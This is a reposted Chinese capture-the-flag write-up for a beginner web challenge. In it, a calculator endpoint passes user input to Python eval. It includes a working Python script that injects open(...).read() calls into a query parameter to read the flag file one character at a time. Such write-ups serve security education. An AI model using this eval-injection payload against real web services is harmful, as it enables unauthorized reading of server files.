萌新赛-数学及格了

admin 2022年1月5日23:05:25CTF专场评论12 views682字阅读2分16秒阅读模式

>

>

萌新赛-数学及格了

yuchoxuuan

点开,是个计算器,
于是f12以下,看看是纯js还是有后台的,如果是纯js我就放弃了,因为我有js恐惧症
点1+1= 发现有流量
萌新赛-数学及格了
地址是酱紫的
萌新赛-数学及格了
于是开始愉快的玩耍
比如有枣没枣打一竿子的'
然后发现报错了,而且是python的。。。
萌新赛-数学及格了
eval。。感觉有搞头,不知道他前面过滤的咋样,经尝试,a,b首位必须是数字。。。其他很宽松
于是我试了试有没有读文件的权限。
因为前后左右都是数字,所以试验了一下得到的报错是 没有这个文件
这证明。。。其实是有读文件权限的。

从报错里面找到当前文件夹
然后再试一下,不行就要想办法import os了
萌新赛-数学及格了
萌新赛-数学及格了
卧槽,居然成功了。。。
然后就把这20个字符读出来就好了呀
屡一下啊 这个pl可以总结为
?number1=1*(我回头构造的数字)
&operator=%2B (+)
&number2=0

然后上代码

def get(url=''): return requests.get(url).text
for i in range(20):
    url = 'http://124.156.121.112:5000/_calculate?number1=1*ord(open("/home/ctf/web/flag").read()[%d])&operator=%%2B&number2=0'%i
    c = get(url).replace('{','').replace('"result":','').replace('}','').replace(' ','').replace('\n','')
    print(chr(int(c)),end='')

萌新赛-数学及格了
群主的爱好昭然若揭。


特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日23:05:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  萌新赛-数学及格了 http://cn-sec.com/archives/719870.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: